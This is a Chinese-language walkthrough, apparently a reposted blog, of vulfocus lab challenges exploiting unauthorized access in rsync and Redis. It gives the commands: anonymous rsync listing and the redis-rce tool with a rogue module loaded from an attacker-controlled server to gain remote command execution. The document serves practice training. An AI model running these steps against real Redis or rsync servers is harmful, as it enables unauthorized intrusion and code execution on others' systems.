未授权漏洞vulfocu靶场实战

rsync未授权漏洞

未授权漏洞vulfocu靶场实战_第1张图片

打开会有一个输入flag的文本框,所以我们需要查找flag如图

未授权漏洞vulfocu靶场实战_第2张图片

把网站的ip信息收集到如图

未授权漏洞vulfocu靶场实战_第3张图片

在kali终端进入 (rootkali)-[~/vulhub/rsync]目录下输入

rsync rsync://123.58.236.76 :19358/src/

未授权漏洞vulfocu靶场实战_第4张图片

上面也说了flag在tmp目录下所以输入

rsync rsync://123.58.236.76:19358/src/tmp/

可以查到flag 如图

未授权漏洞vulfocu靶场实战_第5张图片

复制到靶场flag位置

未授权漏洞vulfocu靶场实战_第6张图片

可以看到通关

未授权漏洞vulfocu靶场实战_第7张图片

也可到宝塔终端输入相同的命令

未授权漏洞vulfocu靶场实战_第8张图片

效果一样

Redis未授权漏洞(CNVD-2019-21763)

未授权漏洞vulfocu靶场实战_第9张图片

进入宝塔服务器终端执行命令

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make

编译之后继续执行命令

git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/

将RedisModules-ExecuteCommand中的module.so这个文件复制到 同目录下redis-rce

cp module.so ./redis-rce

也可以这样复制

cp ./RedisModules-ExecuteCommand/module.so ./redis-rce

复制过去之后进入redis-rce目录查看到module.so已经复制过去了

未授权漏洞vulfocu靶场实战_第10张图片

安装一个pip 命令为下(前提得有yum) 否则没有python运行脚本

yum -y install python-pip

继续执行。安装一个文本文件

pip install -r requirements.txt

python redis-rce.py -r 123.58.236.76 (靶场ip) -p 40321(靶场端口) -L 121.4.55.89(宝塔服务器端口) -f module.so

宝塔服务器端口放行21000(默认端口)

未授权漏洞vulfocu靶场实战_第11张图片

执行之后

未授权漏洞vulfocu靶场实战_第12张图片

输入ls,直接弹出flag,输入到靶场即可通关

redis 未授权访问 (CNVD-2015-07557)

未授权漏洞vulfocu靶场实战_第13张图片

同上一个redis操作,同理输入代码

python redis-rce.py -r 123.58.236.76  -p 24460 -L 121.4.55.89 -f module.so

未授权漏洞vulfocu靶场实战_第14张图片

flag返回出复制到靶场

未授权漏洞vulfocu靶场实战_第15张图片

成功过关

未授权漏洞vulfocu靶场实战_第16张图片

两个redis操作都一样,改一下端口就OK了

你可能感兴趣的:(安全,linux,redis)